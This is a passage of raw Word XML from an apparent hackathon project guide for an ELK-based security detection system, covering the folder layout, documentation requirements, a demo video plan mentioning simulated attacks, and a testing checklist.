      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3996ACA6" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2"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docker-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>compose.yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="646A37CA" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2"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README.md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EB3844" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2"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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>beats_configs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDA7A85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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>filebeat.yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6B9B16C8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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>winlogbeat.yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="37C5E806" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">│   └── </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>suricata.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3E630147" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2"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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>logstash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7734C520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pipeline/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7B4FA4" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">│   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05-normalization.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAB1987" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">│   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05-enrichment.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFF0672" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t>│   │   └── 05-output.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA6F1F3" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t>│   └── config/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>logstash.yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1E9CA30A" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2"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/rules/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A276D1A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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>detection_rules.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="559180AB" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t>│   └── mitre_mapping.csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0214A2" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2"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/docs/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDE7600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architecture.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D61AE1A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dashboard.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7760D596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alert_demo.mp4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EED9E5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SIH_Presentation.pptx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2A1083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system_flowchart.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC86821" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t>│   └── user_manual.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394F7B1A" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t>└── /scripts/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3932685E" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> 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auto_backup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDAA268" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> 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update_rules.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27955BD4" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">    └── alert_webhook.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F0AB02" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t>Everything the judges or mentors need should run from this structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DD4125" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="6D6D07C2">
          <v:rect id="_x0000_i1149" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="011904FB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🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 10.2 — Documentation Essentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E0D12C" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1️</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> README.md (Main Document)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C56378" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t>Include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D85D9C6" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>Project summary &amp; purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330038FA" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>System architecture diagram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A96A391" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>Installation instructions (Docker + Elastic Cloud)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700DB5DC" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>Usage guide (How to trigger APT samples and view alerts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59069E00" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>Contributors + Mentor names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE8412F" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>License (MIT / Apache 2.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0219AA74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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> Example template:</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>👉</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId80" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004536D2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>GitHub README Template</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2DACD9B7" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="0ACF8974">
          <v:rect id="_x0000_i1150" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B291673" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2️</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> User Manual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524F29DF" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t>Explain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42061FA9" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>How to start all containers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF97374" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>How to add new rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCF19E9" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>How to simulate an attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6721C15B" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>How to view dashboards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1503A55D" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>How to export results or alerts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EBAA71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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> Example layout:</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId81" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004536D2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Elastic Docs → Kibana Guide</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="36F679BB" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="56D8D0E0">
          <v:rect id="_x0000_i1151" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A8DC1E" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3️</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Technical Report / Synopsis (2 pages)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711134ED" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t>Sections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C28539F" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Problem Statement &amp; Motivation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721CC769" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proposed System Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551B0061" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Implementation (ELK Stack, Rules, Dashboards)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EA5F2F" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Demo Scenario &amp; Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45524EAA" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Future Enhancements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A09944" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> Reference: </w:t>
      </w:r>
      <w:hyperlink r:id="rId82" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004536D2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>IEEE Project Report Format</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="09248073" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="56D201E2">
          <v:rect id="_x0000_i1152" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="58607ED7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🎥</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 10.3 — Demo Video (30–90 Seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EED2E4" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Recommended sequence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1D2947" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>Title card with project name &amp; team.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C56853" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>Show simulated attack (Atomic Red Team / PowerShell).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4028B3" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>Show live alert triggering in Kibana.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6607E9" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>Show dashboard visualization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274A47EB" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>End with system summary &amp; team credits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B5C6C7" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">Tools: OBS Studio / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>ScreenPal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> / Canva Video Editor.</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:br/>
        <w:t xml:space="preserve">Compress via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>HandBrake</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> to ≤ 100 MB for submission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4397BA47" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="519F1324">
          <v:rect id="_x0000_i1153" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED2048B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🧰</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 10.4 — Testing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3427"/>
      </w:tblGrid>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="6EE5BB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51EAA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1763540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What to Verify</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="7A37F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0BD57" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Log Ingestion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="604CB7E7" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Beats forwarding logs correctly</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="0A4ED7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7C4D6" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Parsing &amp; Normalization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0687297A" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Logstash rules work on all input types</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="726917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6F36F" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Elasticsearch Indexing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EA59C47" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>New data visible within 1 sec</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="715FA9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61D99" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Detection Rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33CA4256" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Alerts trigger &gt; 90 % accuracy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="544021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BAA39" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
